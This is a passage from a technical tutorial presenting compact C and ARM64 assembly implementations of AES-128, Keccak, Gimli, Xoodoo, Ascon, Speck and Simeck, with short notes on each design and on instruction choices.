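// Multiply four packed bytes by 2 in GF(2**8), as in the listing above.
static W M(W x) {
    W t = x & 0x80808080;
    return ((x ^ t) * 2) ^ ((t >> 7) * 27);
}

// Count how many doublings take the round constant from 1 to `last`.
// Returns -1 if `last` is not reached within 255 steps.
static int doublings_until(W last) {
    W c = 1;
    for (int n = 0; n < 255; n++) {
        if (c == last) return n;
        c = M(c);
    }
    return -1;
}
```

Ten doublings reach 108, so the comparison doubles as a round counter without needing a separate variable.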

The handwritten assembly results in approximately 40% less code than the assembly generated by GNU CC. The use of CCMP and CSEL for the statement y = (!z && y == w) ? z = 1 : y; should protect against side-channel attacks. However, as I stated at the beginning of this section, I am not a cryptographer and do not wish to make security claims on the implementations provided here. The BFXIL instruction is used to replace the low 8 bits of the register passed to the SubByte subroutine.

// AES-128 Encryption in ARM64 assembly
// 352 bytes

    .arch armv8-a
    .text

    .global E

// *****************************
// Multiplication over GF(2**8)
// *****************************
M:
    and      w10, w14, 0x80808080
    mov      w12, 27
    lsr      w8, w10, 7
    mul      w8, w8, w12
    eor      w10, w14, w10
    eor      w10, w8, w10, lsl 1
    ret

// *****************************
// B SubByte(B x);
// *****************************
S:
    str      lr, [sp, -16]!
    ands     w7, w13, 0xFF
    beq      SB2

    mov      w14, 1
    mov      w15, 1
    mov      x3, 0xFF
SB0:
    cmp      w15, 1
    ccmp     w14, w7, 0, eq
    csel     w14, w15, w14, eq
    csel     w15, wzr, w15, eq
    bl       M
    eor      w14, w14, w10
    subs     x3, x3, 1
    bne      SB0

    and      w7, w14, 0xFF
    mov      x3, 4
SB1:
    lsr      w10, w14, 7
    orr      w14, w10, w14, lsl 1
    eor      w7, w7, w14
    subs     x3, x3, 1
    bne      SB1
SB2:
    mov      w10, 99
    eor      w7, w7, w10
    bfxil    w13, w7, 0, 8
    ldr      lr, [sp], 16
    ret

// *****************************
// void E(void *s);
// *****************************
E:
    str      lr, [sp, -16]!
    sub      sp, sp, 32

    // copy plain text + master key to x
    // F(8)x[i]=((W*)s)[i];
    ldp      x5, x6, [x0]
    ldp      x7, x8, [x0, 16]
    stp      x5, x6, [sp]
    stp      x7, x8, [sp, 16]

    // c = 1
    mov      w4, 1
L0:
    // AddRoundKey, 1st part of ExpandRoundKey
    // w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
    mov      x2, xzr
    ldr      w13, [sp, 16+3*4]
    add      x1, sp, 16
L1:
    bl       S
    ror      w13, w13, 8
    ldr      w10, [sp, x2, lsl 2]
    ldr      w11, [x1, x2, lsl 2]
    eor      w10, w10, w11
    str      w10, [x0, x2, lsl 2]

    add      x2, x2, 1
    cmp      x2, 4
    bne      L1

    // AddRoundConstant, perform 2nd part of ExpandRoundKey
    // w=R(w,8)^c;F(4)w=k[i]^=w;
    eor      w13, w4, w13, ror 8
L2:
    ldr      w10, [x1]
    eor      w13, w13, w10
    str      w13, [x1], 4

    subs     x2, x2, 1
    bne      L2

    // if round 11, stop
    // if(c==108)break;
    cmp      w4, 108
    beq      L5

    // update round constant
    // c=M(c);
    mov      w14, w4
    bl       M
    mov      w4, w10

    // SubBytes and ShiftRows
    // F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
L3:
    ldrb     w13, [x0, x2]
    bl       S
    and      w10, w2, 3
    lsr      w11, w2, 2
    sub      w11, w11, w10
    and      w11, w11, 3
    add      w10, w10, w11, lsl 2
    strb     w13, [sp, w10, uxtw]

    add      x2, x2, 1
    cmp      x2, 16
    bne      L3

    // if (c != 108)
    cmp      w4, 108
L4:
    beq      L0
    subs     x2, x2, 4

    // MixColumns
    // F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    ldr      w13, [sp, x2]
    eor      w14, w13, w13, ror 8
    bl       M
    eor      w14, w10, w13, ror 8
    eor      w14, w14, w13, ror 16
    eor      w14, w14, w13, ror 24
    str      w14, [sp, x2]

    b        L4
L5:
    add      sp, sp, 32
    ldr      lr, [sp], 16
    ret

7.2 KECCAK

A permutation function designed by the Keccak team (Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche).

#define R(v,n)(((v)<<(n))|((v)>>(64-(n))))
#define F(a,b)for(a=0;a<b;a++)
  
void keccak(void*p){
  unsigned long long n,i,j,r,x,y,t,Y,b[5],*s=p;
  unsigned char RC=1;
  
  F(n,24){
    F(i,5){b[i]=0;F(j,5)b[i]^=s[i+5*j];}
    F(i,5){
      t=b[(i+4)%5]^R(b[(i+1)%5],1);
      F(j,5)s[i+5*j]^=t;}
    t=s[1],y=r=0,x=1;
    F(j,24)
      r+=j+1,Y=2*x+3*y,x=y,y=Y%5,
      Y=s[x+5*y],s[x+5*y]=R(t,r%64),t=Y;
    F(j,5){
      F(i,5)b[i]=s[i+5*j];
      F(i,5)
        s[i+5*j]=b[i]^(~b[(i+1)%5]&b[(i+2)%5]);}
    F(j,7)
      if((RC=(RC<<1)^(113*(RC>>7)))&2)
        *s^=1ULL<<((1<<j)-1);
  }
}

The following source shows how preprocessor directives can make the assembly easier to write and to compare with the original C: each variable is given a #define that maps it to a register. The file must first be processed with CPP using the -E option before it is assembled. I’ve done this so it’s easier to create Keccak-p[800, 22] assembly code for the ARM32 or ARM64 architecture if required later.

The ARM instruction set doesn’t feature a modulus instruction. Unlike the DIV or IDIV instructions on x86, UDIV and SDIV don’t calculate the remainder. The solution is to use a bitwise AND when the divisor is a power of 2, and a combination of division, multiplication and subtraction for everything else. For a divisor n that is not a power of 2, the remainder is a - (n * int(a/n)). In ARM64 assembly, this is implemented with UDIV followed by MSUB.
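The two cases can be written out in C as a minimal sketch. The function names mod_any and mod_pow2 are made up for this example, and the comments only indicate which instruction each line is expected to correspond to.

```c
#include <stdint.h>

// Remainder for any non-zero divisor: a - n * (a / n).
static uint64_t mod_any(uint64_t a, uint64_t n) {
    uint64_t q = a / n;   // UDIV: quotient only, no remainder
    return a - q * n;     // MSUB: a - (q * n)
}

// Remainder when the divisor is a power of 2: a & (n - 1).
static uint64_t mod_pow2(uint64_t a, uint64_t n) {
    return a & (n - 1);   // AND with a mask of the low bits
}
```

In the Keccak code below, the index (i + 4) % 5 is computed the first way, while a reduction modulo 64 would only need the second.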

// keccak-p[1600, 24]
// 428 bytes

    .arch armv8-a
    .text
    .global k1600

    #define s x0
    #define n x1
    #define i x2
    #define j x3
    #define r x4
    #define x x5
    #define y x6
    #define t x7
    #define Y x8
    #define c x9   // round constant (unsigned char)
    #define d x10
    #define v x11
    #define u x12
    #define b sp   // local buffer

k1600:
    sub     sp, sp, 64
    // F(n,24){
    mov     n, 24
    mov     c, 1                // c = 1
L0:
    mov     d, 5
    // F(i,5){b[i]=0;F(j,5)b[i]^=s[i+j*5];}
    mov     i, 0                // i = 0
L1:
    mov     j, 0                // j = 0
    mov     u, 0                // u = 0
L2:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     v, [s, v, lsl 3]    // v = s[v]

    eor     u, u, v             // u ^= v

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L2

    str     u, [b, i, lsl 3]    // b[i] = u

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L1

    // F(i,5){
    mov     i, 0
L3:
    // t=b[(i+4)%5] ^ R(b[(i+1)%5], 63);
    add     v, i, 4             // v = i + 4
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     u, [b, v, lsl 3]    // u = b[v]

    eor     t, t, u, ror 63     // t ^= R(u, 63)

    // F(j,5)s[i+j*5]^=t;}
    mov     j, 0
L4:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     u, [s, v, lsl 3]    // u = s[v]
    eor     u, u, t             // u ^= t
    str     u, [s, v, lsl 3]    // s[v] = u 

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L4

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L3

    // t=s[1],y=r=0,x=1;
    ldr     t, [s, 8]           // t = s[1]
    mov     y, 0                // y = 0
    mov     r, 0                // r = 0
    mov     x, 1                // x = 1

    // F(j,24)
    mov     j, 0
L5:
    add     j, j, 1             // j = j + 1
    // r+=j+1,Y=(x*2)+(y*3),x=y,y=Y%5,
    add     r, r, j             // r = r + j
    add     Y, y, y, lsl 1      // Y = y * 3
    add     Y, Y, x, lsl 1      // Y = Y + (x * 2)
    mov     x, y                // x = y 
    udiv    y, Y, d             // y = (Y / 5)
    msub    y, y, d, Y          // y = (Y - (y * 5)) 

    // Y=s[x+y*5],s[x+y*5]=R(t, -(r - 64) % 64),t=Y;
    madd    v, y, d, x          // v = (y * 5) + x
    ldr     Y, [s, v, lsl 3]    // Y = s[v]
    neg     u, r
    ror     t, t, u             // t = R(t, u)
    str     t, [s, v, lsl 3]    // s[v] = t 
    mov     t, Y

    cmp     j, 24               // j < 24
    bne     L5

    // F(j,5){
    mov     j, 0                // j = 0
L6:
    // F(i,5)b[i] = s[i+j*5];
    mov     i, 0                // i = 0
L7:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     t, [s, v, lsl 3]    // t = s[v]
    str     t, [b, i, lsl 3]    // b[i] = t

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L7

    // F(i,5)
    mov     i, 0                // i = 0
L8:
    // s[i+j*5] = b[i] ^ (b[(i+2)%5] & ~b[(i+1)%5]);}
    add     v, i, 2             // v = i + 2 
    udiv    u, v, d             // u = v / 5
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = v / 5 
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     u, [b, v, lsl 3]    // u = b[v]

    bic     u, t, u             // u = (t & ~u)

    ldr     t, [b, i, lsl 3]    // t = b[i]
    eor     t, t, u             // t ^= u

    madd    v, j, d, i          // v = (j * 5) + i
    str     t, [s, v, lsl 3]    // s[v] = t

    add     i, i, 1             // i++
    cmp     i, 5                // i < 5
    bne     L8

    add     j, j, 1
    cmp     j, 5
    bne     L6

    // F(j,7)
    mov     j, 0                // j = 0
    mov     d, 113
L9:
    // if((c=(c<<1)^((c>>7)*113))&2)
    lsr     t, c, 7             // t = c >> 7
    mul     t, t, d             // t = t * 113 
    eor     c, t, c, lsl 1      // c = t ^ (c << 1)
    and     c, c, 255           // c = c % 256 
    tbz     c, 1, L10           // if (c & 2)

    //   *s^=1ULL<<((1<<j)-1);
    mov     v, 1                // v = 1
    lsl     u, v, j             // u = v << j 
    sub     u, u, 1             // u = u - 1
    lsl     v, v, u             // v = v << u
    ldr     t, [s]              // t = s[0]
    eor     t, t, v             // t ^= v
    str     t, [s]              // s[0] = t
L10:
    add     j, j, 1             // j = j + 1
    cmp     j, 7                // j < 7
    bne     L9

    subs    n, n, 1             // n = n - 1
    bne     L0

    add     sp, sp, 64
    ret

7.3 GIMLI

A permutation function designed by Daniel J. Bernstein, Stefan Kölbl, Stefan Lucks, Pedro Maat Costa Massolino, Florian Mendel, Kashif Nawaz, Tobias Schneider, Peter Schwabe, François-Xavier Standaert, Yosuke Todo, and Benoît Viguier.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)
  
void gimli(void*p){
  unsigned int r,j,t,x,y,z,*s=p;

  for(r=24;r>0;--r){
    for(j=0;j<4;j++)
      x=R(s[j],24),
      y=R(s[4+j],9),
      z=s[8+j],   
      s[8+j]=x^(z+z)^((y&z)*4),
      s[4+j]=y^x^((x|z)*2),
      s[j]=z^y^((x&y)*8);
    t=r&3;    
    if(!t)
      X(0,1),X(2,3),
      *s^=0x9e377900|r;   
    if(t==2)X(0,2),X(1,3);
  }
}

Thus far, I’ve only seen a hash function implemented with this algorithm. However, at Advances in Permutation-Based Cryptography 2018, Benoît Viguier suggested using an Even-Mansour construction to implement a block cipher.
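To give an idea of what that could look like, here is a rough sketch of the textbook single-key Even-Mansour construction, c = P(m ^ k) ^ k, wrapped around the Gimli permutation. It is not taken from the talk: the function names gimli_permute and gimli_em_encrypt and the choice of a 384-bit key are assumptions made purely for illustration.

```c
#include <stdint.h>

static uint32_t rotl32(uint32_t v, unsigned n) {
    return (v << n) | (v >> (32 - n));
}

// Gimli permutation, following the compact C version above.
static void gimli_permute(uint32_t s[12]) {
    uint32_t r, t, x, y, z;
    int j;

    for (r = 24; r > 0; --r) {
        for (j = 0; j < 4; j++) {
            x = rotl32(s[j], 24);
            y = rotl32(s[4 + j], 9);
            z = s[8 + j];
            s[8 + j] = x ^ (z << 1) ^ ((y & z) << 2);
            s[4 + j] = y ^ x ^ ((x | z) << 1);
            s[j]     = z ^ y ^ ((x & y) << 3);
        }
        if ((r & 3) == 0) {   // small swap, then add the round constant
            t = s[0]; s[0] = s[1]; s[1] = t;
            t = s[2]; s[2] = s[3]; s[3] = t;
            s[0] ^= 0x9e377900u | r;
        }
        if ((r & 3) == 2) {   // big swap
            t = s[0]; s[0] = s[2]; s[2] = t;
            t = s[1]; s[1] = s[3]; s[3] = t;
        }
    }
}

// Hypothetical single-key Even-Mansour wrapper: block = P(block ^ key) ^ key.
static void gimli_em_encrypt(const uint32_t key[12], uint32_t block[12]) {
    int i;

    for (i = 0; i < 12; i++) block[i] ^= key[i];  // whiten input
    gimli_permute(block);                         // public permutation
    for (i = 0; i < 12; i++) block[i] ^= key[i];  // whiten output
}
```

Decryption would need the inverse of the permutation, which is not shown here.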

  
// Gimli in ARM64 assembly
// 152 bytes

    .arch armv8-a
    .text

    .global gimli

gimli:
    ldr    w8, =(0x9e377900 | 24)  // c = 0x9e377900 | 24; 
L0:
    mov    w7, 4                // j = 4
    mov    x1, x0               // x1 = s
L1:
    ldr    w2, [x1]             // x = R(s[j],  8);
    ror    w2, w2, 8

    ldr    w3, [x1, 16]         // y = R(s[4+j], 23);
    ror    w3, w3, 23

    ldr    w4, [x1, 32]         // z = s[8+j];

    // s[8+j] = x^(z<<1)^((y&z)<<2);
    eor    w5, w2, w4, lsl 1    // t0 = x ^ (z << 1)
    and    w6, w3, w4           // t1 = y & z
    eor    w5, w5, w6, lsl 2    // t0 = t0 ^ (t1 << 2)
    str    w5, [x1, 32]         // s[8 + j] = t0

    // s[4+j] = y^x^((x|z)<<1);
    eor    w5, w3, w2           // t0 = y ^ x
    orr    w6, w2, w4           // t1 = x | z       
    eor    w5, w5, w6, lsl 1    // t0 = t0 ^ (t1 << 1)
    str    w5, [x1, 16]         // s[4+j] = t0 

    // s[j] = z^y^((x&y)<<3);
    eor    w5, w4, w3           // t0 = z ^ y
    and    w6, w2, w3           // t1 = x & y
    eor    w5, w5, w6, lsl 3    // t0 = t0 ^ (t1 << 3)
    str    w5, [x1], 4          // s[j] = t0, s++

    subs   w7, w7, 1
    bne    L1                   // j != 0

    ldp    w1, w2, [x0]
    ldp    w3, w4, [x0, 8]

    // apply linear layer
    // t0 = (r & 3);
    ands   w5, w8, 3
    bne    L2

    // X(s[2], s[3]);
    stp    w4, w3, [x0, 8]
    // s[0] ^= (0x9e377900 | r);
    eor    w2, w2, w8
    // X(s[0], s[1]);
    stp    w2, w1, [x0]
L2:
    // if (t == 2)
    cmp    w5, 2
    bne    L3

    // X(s[0], s[2]);
    stp    w1, w2, [x0, 8]
    // X(s[1], s[3]);
    stp    w3, w4, [x0]
L3:
    sub    w8, w8, 1           // r--
    uxtb   w5, w8
    cbnz   w5, L0              // r != 0
    ret

7.4 XOODOO

A permutation function designed by the Keccak team. The Xoodoo cookbook includes information on implementing Authenticated Encryption (AE) and a tweakable Wide Block Cipher (WBC).

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define X(u,v)t=s[u],s[u]=s[v],s[v]=t
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void xoodoo(void*p){
  W e[4],a,b,c,t,r,i,*s=p;
  W x[12]={
    0x058,0x038,0x3c0,0x0d0,
    0x120,0x014,0x060,0x02c,
    0x380,0x0f0,0x1a0,0x012};

  for(r=0;r<12;r++){
    F(4)
      e[i]=R(s[i]^s[i+4]^s[i+8],18),
      e[i]^=R(e[i],9);
    F(12)
      s[i]^=e[(i-1)&3];
    X(7,4);X(7,5);X(7,6);
    s[0]^=x[r];
    F(4)
      a=s[i],
      b=s[i+4],
      c=R(s[i+8],21),
      s[i+8]=R((b&~a)^c,24),
      s[i+4]=R((a&~c)^b,31),
      s[i]^=c&~b;
    X(8,10);X(9,11);
  }
}

Again, this is all optimized for size rather than performance.

// Xoodoo in ARM64 assembly
// 268 bytes

    .arch armv8-a
    .text

    .global xoodoo

xoodoo:
    sub    sp, sp, 16          // allocate 16 bytes
    adr    x8, rc
    mov    w9, 12               // 12 rounds
L0:
    mov    w7, 0                // i = 0
    mov    x1, x0
L1:
    ldr    w4, [x1, 32]         // w4 = s[i+8]
    ldr    w3, [x1, 16]         // w3 = s[i+4]
    ldr    w2, [x1], 4          // w2 = s[i+0], advance x1 by 4

    // e[i] = R(s[i] ^ s[i+4] ^ s[i+8], 18);
    eor    w2, w2, w3
    eor    w2, w2, w4
    ror    w2, w2, 18

    // e[i] ^= R(e[i], 9);
    eor    w2, w2, w2, ror 9
    str    w2, [sp, x7, lsl 2]  // store in e

    add    w7, w7, 1            // i++
    cmp    w7, 4                // i < 4
    bne    L1                   //

    // s[i]^= e[(i - 1) & 3];
    mov    w7, 0                // i = 0
L2:
    sub    w2, w7, 1
    and    w2, w2, 3            // w2 = (i - 1) & 3
    ldr    w2, [sp, x2, lsl 2]  // w2 = e[(i - 1) & 3]
    ldr    w3, [x0, x7, lsl 2]  // w3 = s[i]
    eor    w3, w3, w2           // w3 ^= w2 
    str    w3, [x0, x7, lsl 2]  // s[i] = w3 
    add    w7, w7, 1            // i++
    cmp    w7, 12               // i < 12
    bne    L2

    // Rho west
    // X(s[7], s[4]);
    // X(s[7], s[5]);
    // X(s[7], s[6]);
    ldp    w2, w3, [x0, 16]
    ldp    w4, w5, [x0, 24]
    stp    w5, w2, [x0, 16]
    stp    w3, w4, [x0, 24]

    // Iota
    // s[0] ^= *rc++;
    ldrh   w2, [x8], 2         // load half-word, advance by 2
    ldr    w3, [x0]            // load word
    eor    w3, w3, w2          // xor
    str    w3, [x0]            // store word

    mov    w7, 4
    mov    x1, x0
L3:
    // Chi and Rho east
    // a = s[i+0];
    ldr    w2, [x1]

    // b = s[i+4];
    ldr    w3, [x1, 16]

    // c = R(s[i+8], 21);
    ldr    w4, [x1, 32]
    ror    w4, w4, 21

    // s[i+8] = R((b & ~a) ^ c, 24);
    bic    w5, w3, w2
    eor    w5, w5, w4
    ror    w5, w5, 24
    str    w5, [x1, 32]

    // s[i+4] = R((a & ~c) ^ b, 31);
    bic    w5, w2, w4
    eor    w5, w5, w3
    ror    w5, w5, 31
    str    w5, [x1, 16]

    // s[i+0]^= c & ~b;
    bic    w5, w4, w3
    eor    w5, w5, w2
    str    w5, [x1], 4

    // i--
    subs   w7, w7, 1
    bne    L3

    // X(s[8], s[10]);
    // X(s[9], s[11]);
    ldp    w2, w3, [x0, 32] // 8, 9
    ldp    w4, w5, [x0, 40] // 10, 11
    stp    w2, w3, [x0, 40]
    stp    w4, w5, [x0, 32]

    subs   w9, w9, 1           // r--
    bne    L0                  // r != 0

    // release stack
    add    sp, sp, 16
    ret
    // round constants
rc:
    .hword 0x058, 0x038, 0x3c0, 0x0d0
    .hword 0x120, 0x014, 0x060, 0x02c
    .hword 0x380, 0x0f0, 0x1a0, 0x012

7.5 ASCON

A permutation function designed by Christoph Dobraunig, Maria Eichlseder, Florian Mendel and Martin Schläffer. Ascon uses a sponge-based mode of operation. The recommended key, tag and nonce length is 128 bits. The sponge operates on a state of 320 bits, with injected message blocks of 64 or 128 bits. The core permutation iteratively applies an SPN-based round transformation with a 5-bit S-box and a lightweight linear layer.

Ascon website

#define R(x,n)(((x)>>(n))|((x)<<(64-(n))))
typedef unsigned long long W;

void ascon(void*p) {
    int i;
    W   t0,t1,t2,t3,t4,x0,x1,x2,x3,x4,*s=(W*)p;
    
    // load 320-bit state
    x0=s[0];x1=s[1];x2=s[2];x3=s[3];x4=s[4];
    // apply 12 rounds
    for(i=0;i<12;i++) {
      // add round constant
      x2^=((0xFULL-i)<<4)|i;
      // apply non-linear layer
      x0^=x4;x4^=x3;x2^=x1;
      t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
      x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
      x1^=x0;x0^=x4;x3^=x2;x2=~x2;
      // apply linear diffusion layer
      x0^=R(x0,19)^R(x0,28);x1^=R(x1,61)^R(x1,39);
      x2^=R(x2,1)^R(x2,6);x3^=R(x3,10)^R(x3,17);
      x4^=R(x4,7)^R(x4,41);
    }
    // save 320-bit state
    s[0]=x0;s[1]=x1;s[2]=x2;s[3]=x3;s[4]=x4;
}

This algorithm works really well on the ARM64 architecture, because the permutation needs little more than EOR, BIC and ROR on 64-bit registers.
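The non-linear layer is applied to five 64-bit words at once, which amounts to 64 copies of the 5-bit S-box running in parallel. As a small sketch, the same sequence of operations from the C code above can be run on a single 5-bit value to recover the S-box itself. The helper name ascon_sbox is hypothetical, and x0 is assumed to hold the most significant bit.

```c
#include <stdint.h>

// Hypothetical helper: run the non-linear layer of ascon() on one 5-bit
// value, where x0 is the most significant bit and x4 the least.
static unsigned ascon_sbox(unsigned v) {
    uint64_t x0 = (v >> 4) & 1, x1 = (v >> 3) & 1, x2 = (v >> 2) & 1;
    uint64_t x3 = (v >> 1) & 1, x4 = v & 1;
    uint64_t t0, t1, t2, t3, t4;

    // same statements as the non-linear layer in ascon()
    x0 ^= x4; x4 ^= x3; x2 ^= x1;
    t4 = x0 & ~x4; t3 = x4 & ~x3; t2 = x3 & ~x2; t1 = x2 & ~x1; t0 = x1 & ~x0;
    x0 ^= t1; x1 ^= t2; x2 ^= t3; x3 ^= t4; x4 ^= t0;
    x1 ^= x0; x0 ^= x4; x3 ^= x2; x2 = ~x2;

    // only bit 0 of each word is meaningful here
    return (unsigned)(((x0 & 1) << 4) | ((x1 & 1) << 3) | ((x2 & 1) << 2) |
                      ((x3 & 1) << 1) | (x4 & 1));
}
```

Calling ascon_sbox() for every value from 0 to 31 gives the full lookup table, which a bitsliced implementation like the one above never has to store.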

  
// ASCON in ARM64 assembly
// 192 bytes

    .arch armv8-a
    .text

    .global ascon

ascon:
    mov    x10, x0
    // load 320-bit state
    ldp    x0, x1, [x10]
    ldp    x2, x3, [x10, 16]
    ldr    x4, [x10, 32]

    // apply 12 rounds
    mov    x11, xzr
L0:
    // add round constant
    // x2^=((0xFULL-i)<<4)|i;
    mov    x12, 0xF
    sub    x12, x12, x11
    orr    x12, x11, x12, lsl 4
    eor    x2, x2, x12

    // apply non-linear layer
    // x0^=x4;x4^=x3;x2^=x1;
    eor    x0, x0, x4
    eor    x4, x4, x3
    eor    x2, x2, x1

    // t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
    bic    x5, x1, x0
    bic    x6, x2, x1
    bic    x7, x3, x2
    bic    x8, x4, x3
    bic    x9, x0, x4

    // x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
    eor    x0, x0, x6
    eor    x1, x1, x7
    eor    x2, x2, x8
    eor    x3, x3, x9
    eor    x4, x4, x5

    // x1^=x0;x0^=x4;x3^=x2;x2=~x2;
    eor    x1, x1, x0
    eor    x0, x0, x4
    eor    x3, x3, x2
    mvn    x2, x2

    // apply linear diffusion layer
    // x0^=R(x0,19)^R(x0,28);
    ror    x5, x0, 19
    eor    x5, x5, x0, ror 28
    eor    x0, x0, x5

    // x1^=R(x1,61)^R(x1,39);
    ror    x5, x1, 61
    eor    x5, x5, x1, ror 39
    eor    x1, x1, x5

    // x2^=R(x2,1)^R(x2,6);
    ror    x5, x2, 1
    eor    x5, x5, x2, ror 6
    eor    x2, x2, x5

    // x3^=R(x3,10)^R(x3,17);
    ror    x5, x3, 10
    eor    x5, x5, x3, ror 17
    eor    x3, x3, x5

    // x4^=R(x4,7)^R(x4,41);
    ror    x5, x4, 7
    eor    x5, x5, x4, ror 41
    eor    x4, x4, x5

    // i++
    add    x11, x11, 1
    // i < 12
    cmp    x11, 12
    bne    L0

    // save 320-bit state
    stp    x0, x1, [x10]
    stp    x2, x3, [x10, 16]
    str    x4, [x10, 32]
    ret

7.6 SPECK

A block cipher from the NSA that was intended to make its way into IoT devices. Designed by Ray Beaulieu, Douglas Shors, Jason Smith, Stefan Treatman-Clark, Bryan Weeks and Louis Wingers.

The SIMON and SPECK Families of Lightweight Block Ciphers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void speck(void*mk,void*p){
  W k[4],*x=p,i,t;
  
  F(4)k[i]=((W*)mk)[i];
  
  F(27)
    *x=(R(*x,8)+x[1])^*k,
    x[1]=R(x[1],29)^*x,
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,29)^k[3],
    k[1]=k[2],k[2]=t;
}

SPECK has been surrounded by controversy since the NSA proposed including it in the ISO/IEC 29192-2 portfolio. However, it is still useful for shellcodes.

// SPECK64/128 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck64

    // speck64(void*mk, void*data);
speck64:
    // load 128-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    w5, w6, [x0]
    ldp    w7, w8, [x0, 8]
    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0 = x[0]; x1 = x[1];
    mov    w3, wzr              // i=0
L0:
    ror    w2, w2, 8
    add    w2, w2, w4           // x0 = (R(x0, 8) + x1) ^ k0;
    eor    w2, w2, w5           //
    eor    w4, w2, w4, ror 29   // x1 = R(x1, 29) ^ x0;
    mov    w9, w8               // backup k3
    ror    w6, w6, 8
    add    w8, w5, w6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    w8, w8, w3           //
    eor    w5, w8, w5, ror 29   // k0 = R(k0, 29) ^ k3;
    mov    w6, w7               // k1 = k2;
    mov    w7, w9               // k2 = t;
    add    w3, w3, 1            // i++;
    cmp    w3, 27               // i < 27;
    bne    L0

    // save result
    stp    w2, w4, [x1]         // x[0] = x0; x[1] = x1;
    ret

Since there isn’t a huge difference between the two variants, here’s the 128/256 version that works best on 64-bit architectures.

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned long long W;

void speck128(void*mk,void*p){
  W k[4],*x=p,i,t;

  F(4)k[i]=((W*)mk)[i];
  
  F(34)
    x[1]=(R(x[1],8)+*x)^*k,
    *x=R(*x,61)^x[1],
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,61)^k[3],
    k[1]=k[2],k[2]=t;
}

Again, the assembly is almost exactly the same.

  
// SPECK128/256 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck128

    // speck128(void*mk, void*data);
speck128:
    // load 256-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    x5, x6, [x0]
    ldp    x7, x8, [x0, 16]
    // load 128-bit plain text
    ldp    x2, x4, [x1]         // x0 = x[0]; x1 = x[1];
    mov    x3, xzr              // i=0
L0:
    ror    x4, x4, 8
    add    x4, x4, x2           // x1 = (R(x1, 8) + x0) ^ k0;
    eor    x4, x4, x5           //
    eor    x2, x4, x2, ror 61   // x0 = R(x0, 61) ^ x1;
    mov    x9, x8               // backup k3
    ror    x6, x6, 8
    add    x8, x5, x6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    x8, x8, x3           //
    eor    x5, x8, x5, ror 61   // k0 = R(k0, 61) ^ k3;
    mov    x6, x7               // k1 = k2;
    mov    x7, x9               // k2 = t;
    add    x3, x3, 1            // i++;
    cmp    x3, 34               // i < 34;
    bne    L0

    // save result
    stp    x2, x4, [x1]         // x[0] = x0; x[1] = x1;
    ret

The designs are nice, but independent cryptographers suggest there may be weaknesses in these ciphers that only the NSA knows about.

7.7 SIMECK

A block cipher designed by Gangqiang Yang, Bo Zhu, Valentin Suder, Mark D. Aagaard, and Guang Gong, published in 2015. According to the authors, SIMECK combines the good design components of both SIMON and SPECK in order to devise more compact and efficient block ciphers.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)

void simeck(void*mk,void*p){
  unsigned int t,k0,k1,k2,k3,l,r,*k=mk,*x=p;
  unsigned long long s=0x938BCA3083F;

  k0=*k;k1=k[1];k2=k[2];k3=k[3]; 
  r=*x;l=x[1];

  do{
    r^=R(l,1)^(R(l,5)&l)^k0;
    X(l,r);
    t=(s&1)-4;
    k0^=R(k1,1)^(R(k1,5)&k1)^t;    
    X(k0,k1);X(k1,k2);X(k2,k3);
  } while(s>>=1);
  *x=r; x[1]=l;
}

I cannot say if SIMECK is more compact than SIMON in hardware. However, SPECK is clearly more compact in software.

  
// SIMECK in ARM64 assembly
// 100 bytes

    .arch armv8-a
    .text
    .global simeck

simeck:
     // unsigned long long s = 0x938BCA3083F;
     movz    x2, 0x083F
     movk    x2, 0xBCA3, lsl 16
     movk    x2, 0x0938, lsl 32

     // load 128-bit key 
     ldp     w3, w4, [x0]
     ldp     w5, w6, [x0, 8]

     // load 64-bit plaintext 
